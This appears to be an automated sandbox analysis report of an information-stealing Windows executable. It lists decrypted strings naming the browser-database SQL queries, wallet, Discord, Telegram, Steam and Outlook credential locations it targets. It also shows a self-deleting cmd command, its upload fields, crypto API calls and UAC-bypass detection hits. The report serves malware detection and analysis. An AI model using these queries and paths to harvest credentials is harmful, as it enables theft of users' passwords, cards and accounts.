Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: PK11_Authenticate
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: PK11SDR_Decrypt
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: C:\ProgramData\
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: browser:
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: profile:
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: url:
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: login:
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: password:
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: Opera
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: OperaGX
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: Network
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: cookies
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: .txt
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: TRUE
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: FALSE
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: autofill
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: SELECT name, value FROM autofill
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: history
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: SELECT url FROM urls LIMIT 1000
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: name:
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: month:
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: year:
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: card:
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: Cookies
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: Login Data
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: Web Data
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: History
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: logins.json
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: formSubmitURL
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: usernameField
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: encryptedUsername
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: encryptedPassword
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: guid
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: cookies.sqlite
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: formhistory.sqlite
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: places.sqlite
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: plugins
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: Local Extension Settings
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: Sync Extension Settings
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: IndexedDB
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: Opera Stable
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: Opera GX Stable
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: CURRENT
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: chrome-extension_
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: _0.indexeddb.leveldb
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: Local State
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: profiles.ini
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: chrome
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: opera
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: firefox
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: wallets
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: %08lX%04lX%lu
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: ProductName
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: %d/%d/%d %d:%d:%d
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: ProcessorNameString
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: DisplayName
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: DisplayVersion
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: Network Info:
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: - IP: IP?
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: - Country: ISO?
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: System Summary:
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: - HWID:
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: - OS:
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: - Architecture:
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: - UserName:
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: - Computer Name:
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: - Local Time:
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: - UTC:
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: - Language:
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: - Keyboards:
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: - Laptop:
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: - Running Path:
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: - CPU:
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: - Threads:
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: - Cores:
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: - RAM:
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: - Display Resolution:
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: - GPU:
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: User Agents:
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: Installed Apps:
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: All Users:
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: Current User:
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: Process List:
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: system_info.txt
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: freebl3.dll
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: mozglue.dll
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: msvcp140.dll
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: nss3.dll
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: softokn3.dll
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: vcruntime140.dll
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: \Temp\
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: .exe
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: runas
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: open
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: /c start
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: %DESKTOP%
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: %APPDATA%
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: %LOCALAPPDATA%
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: %USERPROFILE%
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: %DOCUMENTS%
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: %PROGRAMFILES%
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: %PROGRAMFILES_86%
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: %RECENT%
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: *.lnk
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: files
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: \discord\
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: \Local Storage\leveldb\CURRENT
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: \Local Storage\leveldb
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: \Telegram Desktop\
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: key_datas
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: D877F783D5D3EF8C*
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: map*
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: A7FDF864FBC10B77*
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: A92DAA6EA6F891F2*
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: F8806DD0C461824F*
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: Telegram
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: *.tox
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: *.ini
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: Password
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: 00000001
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: 00000002
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: 00000003
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: 00000004
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: \Outlook\accounts.txt
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: Pidgin
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: \.purple\
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: accounts.xml
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: dQw4w9WgXcQ
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: token:
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: Software\Valve\Steam
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: SteamPath
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: \config\
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: ssfn*
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: config.vdf
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: DialogConfig.vdf
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: DialogConfigOverlay*.vdf
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: libraryfolders.vdf
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: loginusers.vdf
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: \Steam\
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: sqlite3.dll
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: browsers
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: done
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: soft
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: \Discord\tokens.txt
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: /c timeout /t 5 & del /f /q "
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: C:\Windows\system32\cmd.exe
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: https
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: POST
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: HTTP/1.1
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: Content-Disposition: form-data; name="
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: hwid
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: build
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: token
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: file_name
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: file
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: message
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 1.2.u5c4.0.exe.400000.0.unpack	String decryptor: screenshot.jpg

Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_00409540 CryptUnprotectData,LocalAlloc,LocalFree,	1_2_00409540
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_004155A0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	1_2_004155A0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_00406C10 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	1_2_00406C10
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_004094A0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	1_2_004094A0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_0040BF90 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	1_2_0040BF90
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BBFA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	1_2_6BBFA9A0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BBF43B0 PK11_PubEncryptPKCS1,PR_SetError,	1_2_6BBF43B0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BC20180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	1_2_6BC20180
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BC1A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	1_2_6BC1A730
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BBDE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	1_2_6BBDE6E0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BBD8670 PK11_ExportEncryptedPrivKeyInfo,	1_2_6BBD8670
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BBFA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	1_2_6BBFA650
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BC425B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	1_2_6BC425B0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BBF44C0 PK11_PubEncrypt,	1_2_6BBF44C0
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BBC4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	1_2_6BBC4420
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Code function: 1_2_6BBF4440 PK11_PrivDecrypt,	1_2_6BBF4440
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Code function: 2_2_00DF4280 CreateFileW,GetLastError,GetFileSize,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,__allrem,ReadFile,CryptDecrypt,CloseHandle,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,	2_2_00DF4280
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Code function: 2_2_00DF45A0 CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDestroyHash,CryptReleaseContext,CryptDeriveKey,CryptDestroyHash,CryptReleaseContext,	2_2_00DF45A0

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 13.2.run.exe.37b586d.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.cmd.exe.56c5e64.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.cmd.exe.56c5264.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.cmd.exe.57f9264.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.cmd.exe.57f9e64.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.run.exe.450d86d.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.run.exe.4551d5b.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.run.exe.37f9d5b.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.cmd.exe.57b5976.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.run.exe.37f915b.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.cmd.exe.5681976.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.run.exe.455115b.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2139822498.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2138835462.000000000567B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1888066079.0000000004506000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2368098035.00000000057AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: run.exe PID: 7184, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 7216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: run.exe PID: 8040, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 8068, type: MEMORYSTR

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Unpacked PE file: 0.2.kO1P1YnLst.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Unpacked PE file: 1.2.u5c4.0.exe.400000.0.unpack

Source: kO1P1YnLst.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\kO1P1YnLst.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 169.150.236.100:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 169.150.236.100:443 -> 192.168.2.4:49750 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: u5c4.0.exe, 00000001.00000002.2520130811.000000006CCAD000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: /_/obj/Release/Microsoft.ApplicationInsights/net46/Microsoft.ApplicationInsights.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3046047678.00000240F7DD0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: nss3.pdb@ source: u5c4.0.exe, 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Cleanup\obj\Release\Cleanup.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3036160514.00000240F7980000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveHUD\obj\Debug\PerceiveHUD.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3036570950.00000240F79A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Win32TaskScheduler\obj\Release\Win32TaskScheduler.pdbz9 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: c:\release\WorkingDir\PrismLibraryBuild\PrismLibrary\Desktop\Prism\obj\Release\Microsoft.Practices.Prism.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3042123428.00000240F7C70000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: run.exe, 00000002.00000002.1883500412.00000000031A0000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000002.00000002.1888596388.00000000049F8000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000002.00000002.1888307607.0000000004640000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2138665040.00000000052D8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000003.00000002.2139000539.00000000057B0000.00000004.00001000.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2140183623.0000000003C40000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2139995282.00000000038E4000.00000004.00000020.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2140368721.0000000003FF7000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2370662584.00000000058E0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000F.00000002.2367955603.0000000005409000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Bootstrap\obj\Release\Bootstrap.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb\| source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3047078708.00000240F7F30000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\STDHash\obj\Release\STDHash.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: mozglue.pdb source: u5c4.0.exe, 00000001.00000002.2520130811.000000006CCAD000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UniversalInstaller.pdb source: run.exe, 00000002.00000002.1882327714.0000000000F3C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000002.00000000.1797546896.0000000000F3C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000D.00000000.2066260274.0000000000F3C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000D.00000002.2136653870.0000000000F3C000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Telemetry\obj\Release\Telemetry.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3071517610.00000240FE690000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb^ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: D:\Projects\Personal\DeviceId\src\DeviceId\obj\Release\net40\DeviceId.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3072206090.00000240FE6E0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Downloader\obj\Release\Downloader.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000011.00000002.3027627849.00000240F7070000.00000004.08000000.00040000.00000000.sdmp
